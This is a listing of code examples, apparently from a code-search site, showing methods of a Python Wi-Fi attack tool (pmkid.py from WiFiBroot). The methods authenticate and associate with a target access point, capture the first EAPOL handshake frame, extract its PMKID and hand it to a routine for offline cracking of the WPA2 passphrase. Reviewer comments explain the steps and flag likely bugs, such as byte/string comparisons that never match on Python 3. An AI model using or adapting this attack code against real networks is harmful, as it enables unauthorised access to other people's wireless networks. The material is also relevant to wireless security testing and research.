コード例 #1
	def asso_conn(self):
		"""Send association requests until the EAPOL step flag is set.

		When ``__ASSO_STATUS`` is falsy, a daemon thread running
		``self.asso_sniffer`` on ``self.iface`` is started first. The loop then
		sends ``self.asso`` once per pass, waits 2 seconds, and gives up after
		``self.retry_limit`` passes (logging the limit and sleeping 30 seconds).

		Returns:
			The value of ``__ASSO_STEP`` when the loop ends.
		"""
		if not self.__ASSO_STATUS:
			listener = threading.Thread(
				target=self.asso_sniffer,
				args=(self.iface,),
				name="Association Depender",
			)
			listener.daemon = True
			listener.start()

		attempts = 0

		# Nothing in this method sets __ASSO_STEP; presumably the sniffer
		# thread's packet handler flips it - confirm against asso_sniffer.
		while not self.__ASSO_STEP:
			self._randn_(4)

			# NOTE(review): the logged frame count is self._randn, while sendp
			# below always transmits count=1.
			if self.verbose:
				line = "%i Frames %s (%s) %s>%s %s (%s) %s[Association Request]%s" % (
					self._randn,
					self.cl.replace(':', '').upper(),
					self.pull.DARKCYAN + org(self.cl).org + self.pull.END,
					self.pull.RED,
					self.pull.END,
					self.ap.replace(':', '').upper(),
					self.pull.DARKCYAN + org(self.ap).org + self.pull.END,
					self.pull.BLUE,
					self.pull.END,
				)
			else:
				line = "%i Frames %s %s>%s %s %s[Association Request]%s" % (
					self._randn,
					self.cl.replace(':', '').upper(),
					self.pull.RED,
					self.pull.END,
					self.ap.replace(':', '').upper(),
					self.pull.BLUE,
					self.pull.END,
				)
			self.pull.up(line)

			sendp(self.asso, iface=self.iface, count=1, verbose=False)
			time.sleep(2)
			attempts += 1
			if attempts >= self.retry_limit:
				self.pull.right("Maximum Limit Reached for Association Requests.")
				# The message announces a restart, but this method only
				# sleeps and returns; any restart is up to the caller.
				self.pull.info("Sleeping! Would restart the process in 30 seconds. ")
				time.sleep(30)
				break

		return self.__ASSO_STEP
コード例 #2
	def _randn_(self, _max):
		"""Refresh ``self._randn``, the number printed in the "%i Frames" log lines.

		A non-zero ``self._nframes`` is copied as-is. When it is 0 the value
		comes from ``org().randomness(_max, self._randn)``.
		"""
		fixed = self._nframes
		if fixed != 0:
			self._randn = fixed
		else:
			# randomness() is defined outside this excerpt; presumably it
			# picks a count bounded by _max - confirm in the org class.
			self._randn = org().randomness(_max, self._randn)
		
コード例 #3
	def get_asso_resp(self, pkt):
		"""Inspect one captured packet for the association reply and EAPOL message 1.

		A successful association response (status 0) addressed from ``self.ap``
		to ``self.cl`` is only logged. An EAPOL frame from ``self.ap`` with a
		non-zero nonce and an all-zero MIC is stored in ``__EAPOL`` and
		``__ASSO_STEP`` is set.

		Raises:
			ValueError: after a matching EAPOL frame has been stored;
				presumably the caller's sniff loop treats this as its stop
				signal - confirm in asso_sniffer.
		"""
		if pkt.haslayer(Dot11AssoResp) and pkt.getlayer(Dot11AssoResp).status == 0:
			dot11 = pkt.getlayer(Dot11)
			sender = dot11.addr2.replace(':', '')
			receiver = dot11.addr1.replace(':', '')
			if receiver == self.cl.replace(':', '') and sender == self.ap.replace(':', ''):
				self.pull.info("1 Frames %s > %s %s[Association Response]%s" % (
					self.ap.replace(':', '').upper(),
					self.cl.replace(':', '').upper(),
					self.pull.YELLOW,
					self.pull.END,
				))
				if self.verbose:
					self.pull.info("Association with Access Point %s[SuccessFull]%s" % (self.pull.GREEN, self.pull.END))
					self.pull.info("Waiting For EAPOL to initate...")

		if not pkt.haslayer(EAPOL):
			return

		sender = pkt.getlayer(Dot11).addr2.replace(':', '')
		# Fixed hex offsets into the Raw payload: chars 26:90 are bytes 13-44
		# and chars 154:186 are bytes 77-92. Presumably these are the Key Nonce
		# and Key MIC fields of the EAPOL-Key body; this depends on the scapy
		# version leaving that body undissected - confirm.
		# NOTE(review): no length check is made, so a short payload yields
		# short or empty slices rather than an error.
		key_hex = binascii.hexlify(pkt.getlayer(Raw).load)
		nonce = key_hex[26:90]
		mic = key_hex[154:186]
		empty_nonce = "0000000000000000000000000000000000000000000000000000000000000000"
		empty_mic = "00000000000000000000000000000000"
		# NOTE(review): hexlify() returns bytes on Python 3, where comparing
		# against these str literals never matches - confirm the interpreter.
		if sender == self.ap.replace(':', '') and nonce != empty_nonce and mic == empty_mic:
			self.__ASSO_STEP = True
			self.pull.up("EAPOL %s > %s %s[1 of 4]%s" % (
				self.ap.replace(':', '').upper(),
				self.cl.replace(':', '').upper(),
				self.pull.BOLD + self.pull.GREEN,
				self.pull.END,
			))
			if self.verbose:
				self.pull.info("Successfull handshake initiated [%s]" % org(self.ap).org)
			self.__EAPOL = pkt
			raise ValueError
コード例 #4
	def dev_conn(self):
		"""Send open-authentication frames until the auth step flag is set.

		A daemon thread running ``self.auth_sniffer`` on ``self.iface`` is
		always started first. Each pass sends ``self.auth`` twice and then
		waits 1 second, unless ``__AUTH_STATUS`` is falsy, in which case the
		loop stops after the first send.

		Returns:
			The value of ``__AUTH_STEP`` when the loop ends.
		"""
		listener = threading.Thread(
			target=self.auth_sniffer,
			args=(self.iface,),
			name="Authentication Catcher",
		)
		listener.daemon = True
		listener.start()

		# NOTE(review): there is no retry limit here; the loop ends only when
		# __AUTH_STEP becomes truthy or __AUTH_STATUS is falsy.
		while not self.__AUTH_STEP:
			self._randn_(3)
			if self.verbose:
				line = "%i Frames %s (%s) %s>%s %s (%s) %s[Open Authentication]%s" % (
					self._randn,
					self.cl.replace(':', '').upper(),
					self.pull.DARKCYAN + org(self.cl).org + self.pull.END,
					self.pull.RED,
					self.pull.END,
					self.ap.replace(':', '').upper(),
					self.pull.DARKCYAN + org(self.ap).org + self.pull.END,
					self.pull.BLUE,
					self.pull.END,
				)
			else:
				line = "%i Frames %s %s>%s %s %s[Open Authentication]%s" % (
					self._randn,
					self.cl.replace(':', '').upper(),
					self.pull.RED,
					self.pull.END,
					self.ap.replace(':', '').upper(),
					self.pull.BLUE,
					self.pull.END,
				)
			self.pull.up(line)

			sendp(self.auth, iface=self.iface, count=2, verbose=False)
			if not self.__AUTH_STATUS:
				break
			time.sleep(1)

		return self.__AUTH_STEP
コード例 #5
	def get_auth_resp(self, pkt):
		"""Inspect one captured packet for the authentication reply.

		Packets without both a RadioTap and a Dot11Auth layer, or not addressed
		from ``self.ap`` to ``self.cl``, are ignored. A matching frame is
		logged and ``__AUTH_STEP`` is set.

		NOTE(review): the Dot11Auth status field is never read, so any
		authentication frame from the AP to the client is logged as
		"SuccessFull" - confirm whether that is intended.

		Raises:
			ValueError: after a matching frame has been recorded; presumably
				the caller's sniff loop treats this as its stop signal -
				confirm in auth_sniffer.
		"""
		if not (pkt.haslayer(RadioTap) and pkt.haslayer(Dot11Auth)):
			return

		dot11 = pkt.getlayer(Dot11)
		sender = dot11.addr2.replace(':', '')
		receiver = dot11.addr1.replace(':', '')
		if receiver != self.cl.replace(':', '') or sender != self.ap.replace(':', ''):
			return

		if self.verbose:
			self.pull.info("Received %s (%s) %s<%s %s (%s) %s[Open Authentication]%s" % (
				self.cl.replace(':', '').upper(),
				self.pull.DARKCYAN + org(self.cl).org + self.pull.END,
				self.pull.RED,
				self.pull.END,
				self.ap.replace(':', '').upper(),
				self.pull.DARKCYAN + org(self.ap).org + self.pull.END,
				self.pull.YELLOW,
				self.pull.END,
			))
			self.pull.info("Authentication %s (%s) %s>%s %s (%s) %s[SuccessFull]%s" % (
				self.ap.replace(':', '').upper(),
				self.pull.DARKCYAN + org(self.ap).org + self.pull.END,
				self.pull.RED,
				self.pull.END,
				self.cl.replace(':', '').upper(),
				self.pull.DARKCYAN + org(self.cl).org + self.pull.END,
				self.pull.GREEN,
				self.pull.END,
			))
		else:
			self.pull.info("Received %s %s<%s %s %s[Open Authentication]%s" % (
				self.cl.replace(':', '').upper(),
				self.pull.RED,
				self.pull.END,
				self.ap.replace(':', '').upper(),
				self.pull.YELLOW,
				self.pull.END,
			))
			self.pull.info("Authentication %s %s>%s %s %s[SuccessFull]%s" % (
				self.ap.replace(':', '').upper(),
				self.pull.RED,
				self.pull.END,
				self.cl.replace(':', '').upper(),
				self.pull.GREEN,
				self.pull.END,
			))

		self.__AUTH_STEP = True
		raise ValueError
コード例 #6
ファイル: pmkid.py プロジェクト: zxc2007/WiFiBroot
    def get_asso_resp(self, pkt):
        """Inspect one captured packet for the association reply and EAPOL message 1.

        A successful association response (status 0) addressed from ``self.ap``
        to ``self.cl`` is logged; the "Authentication"/"EAPOL ... Waiting"
        lines are printed only the first time, guarded by ``__M_PLACED``. An
        EAPOL frame from ``self.ap`` with a non-zero nonce and an all-zero MIC
        is stored in ``__EAPOL`` and ``__ASSO_STEP`` is set.

        Raises:
            ValueError: with the message "EAPOL", after a matching EAPOL frame
                has been stored; presumably the caller's sniff loop treats this
                as its stop signal - confirm in the sniffer.
        """
        pull = self.pull

        if pkt.haslayer(Dot11AssoResp) and pkt.getlayer(Dot11AssoResp).status == 0:
            dot11 = pkt.getlayer(Dot11)
            sender = dot11.addr2.replace(':', '')
            receiver = dot11.addr1.replace(':', '')
            if receiver == self.cl.replace(':', '') and sender == self.ap.replace(':', ''):
                ap_hex = self.ap.replace(':', '').upper()
                cl_hex = self.cl.replace(':', '').upper()

                if self.verbose:
                    pull.info("Received %s (%s) %s<%s %s (%s) %s[Association Response]%s" % (
                        cl_hex,
                        pull.DARKCYAN + org(self.cl).org + pull.END,
                        pull.RED,
                        pull.END,
                        ap_hex,
                        pull.DARKCYAN + org(self.ap).org + pull.END,
                        pull.YELLOW,
                        pull.END,
                    ))
                else:
                    pull.info("Received %s %s<%s %s %s[Association Response]%s" % (
                        cl_hex, pull.RED, pull.END, ap_hex, pull.YELLOW, pull.END,
                    ))

                # One-time status lines; __M_PLACED keeps repeats of the
                # association response from printing them again.
                if not self.__M_PLACED:
                    if self.verbose:
                        pull.info("Authentication %s (%s) %s>%s %s (%s) %s[SuccessFull]%s" % (
                            ap_hex,
                            pull.DARKCYAN + org(self.ap).org + pull.END,
                            pull.RED,
                            pull.END,
                            cl_hex,
                            pull.DARKCYAN + org(self.cl).org + pull.END,
                            pull.GREEN,
                            pull.END,
                        ))
                        pull.info("EAPOL %s (%s) %s>%s %s (%s) %s[Waiting...]%s" % (
                            ap_hex,
                            pull.DARKCYAN + org(self.ap).org + pull.END,
                            pull.RED,
                            pull.END,
                            cl_hex,
                            pull.DARKCYAN + org(self.cl).org + pull.END,
                            pull.PURPLE,
                            pull.END,
                        ))
                    else:
                        pull.info("Authentication %s %s>%s %s %s[SuccessFull]%s" % (
                            ap_hex, pull.RED, pull.END, cl_hex, pull.GREEN, pull.END,
                        ))
                        pull.info("EAPOL %s %s>%s %s %s[Waiting...]%s" % (
                            ap_hex, pull.RED, pull.END, cl_hex, pull.PURPLE, pull.END,
                        ))
                    self.__M_PLACED = True

        if not pkt.haslayer(EAPOL):
            return

        sender = pkt.getlayer(Dot11).addr2.replace(':', '')
        # Fixed hex offsets into the Raw payload: chars 26:90 are bytes 13-44
        # and chars 154:186 are bytes 77-92. Presumably these are the Key Nonce
        # and Key MIC fields of the EAPOL-Key body; this depends on the scapy
        # version leaving that body undissected - confirm.
        # NOTE(review): no length check is made, so a short payload yields
        # short or empty slices rather than an error.
        key_hex = binascii.hexlify(pkt.getlayer(Raw).load)
        nonce = key_hex[26:90]
        mic = key_hex[154:186]
        empty_nonce = "0000000000000000000000000000000000000000000000000000000000000000"
        empty_mic = "00000000000000000000000000000000"
        # NOTE(review): hexlify() returns bytes on Python 3, where comparing
        # against these str literals never matches - confirm the interpreter.
        if sender == self.ap.replace(':', '') and nonce != empty_nonce and mic == empty_mic:
            self.__ASSO_STEP = True
            ap_hex = self.ap.replace(':', '').upper()
            if self.verbose:
                pull.info("EAPOL %s (%s) %s>%s %s (%s) %s[Initiated]%s" % (
                    ap_hex,
                    pull.DARKCYAN + org(self.ap).org + pull.END,
                    pull.RED,
                    pull.END,
                    self.cl.replace(':', '').upper(),
                    pull.DARKCYAN + org(self.cl).org + pull.END,
                    pull.YELLOW,
                    pull.END,
                ))
                pull.up("EAPOL %s (%s) %s>%s %s (%s) %s[1 of 4]%s" % (
                    ap_hex,
                    pull.DARKCYAN + org(self.ap).org + pull.END,
                    pull.RED,
                    pull.END,
                    self.cl.replace(':', '').upper(),
                    pull.DARKCYAN + org(self.cl).org + pull.END,
                    pull.GREEN,
                    pull.END,
                ))
            else:
                pull.info("EAPOL %s %s>%s %s %s[Initiated]%s" % (
                    ap_hex,
                    pull.RED,
                    pull.END,
                    self.cl.replace(':', '').upper(),
                    pull.YELLOW,
                    pull.END,
                ))
                pull.up("EAPOL %s %s>%s %s %s[1 of 4]%s" % (
                    ap_hex,
                    pull.RED,
                    pull.END,
                    self.cl.replace(':', '').upper(),
                    pull.BOLD + pull.GREEN,
                    pull.END,
                ))
            self.__EAPOL = pkt
            raise ValueError("EAPOL")
コード例 #7
ファイル: pmkid.py プロジェクト: zxc2007/WiFiBroot
    def crack(self, _write):
        """Extract the PMKID from the stored EAPOL frame and pass it on.

        Reads hex chars 202:234 (bytes 101-116) of the Raw payload of
        ``__EAPOL``. If that slice is empty or all zeros, an error is logged
        and the process exits. Otherwise the value is logged, handed to
        ``self.save(_write, PMKID)`` and then to ``self.crack_the_pmk``.

        A non-zero PMKID in message 1 allows the pre-shared key to be guessed
        offline, which is why WPA2-PSK deployments rely on long random
        passphrases or move to WPA3-SAE.

        Args:
            _write: forwarded unchanged to ``self.save``; presumably an output
                path - confirm against save().

        Returns:
            Whatever ``self.crack_the_pmk`` returns for the extracted PMKID.
        """
        empty_pmkid = '00000000000000000000000000000000'
        # The fixed offset presumably assumes the PMKID KDE is the first
        # element of the key data - confirm against the frames this handles.
        key_hex = binascii.hexlify(self.__EAPOL.getlayer(Raw).load)
        pmkid = key_hex[202:234]

        # NOTE(review): hexlify() returns bytes on Python 3, where neither
        # comparison below can be true and an all-zero PMKID would be
        # reported as present - confirm the interpreter.
        if pmkid == empty_pmkid or pmkid == '':
            self.pull.error("The target AP doesn't contain PMKID field. Not Vulnerable. Try with handshake. ")
            # NOTE(review): exit status 0 is used on this path, so a calling
            # script cannot tell it apart from a normal finish.
            sys.exit(0)

        self.pull.special("Vulnerable to PMKID Attack!")
        if self.verbose:
            self.pull.up("PMKID %s (%s) [%s]" % (
                self.ap.replace(':', '').upper(),
                self.pull.DARKCYAN + org(self.ap).org + self.pull.END,
                self.pull.RED + pmkid + self.pull.END,
            ))
        else:
            self.pull.up("PMKID %s [%s]" % (
                self.ap.replace(':', '').upper(),
                self.pull.RED + pmkid + self.pull.END,
            ))

        self.save(_write, pmkid)

        return self.crack_the_pmk(pmkid)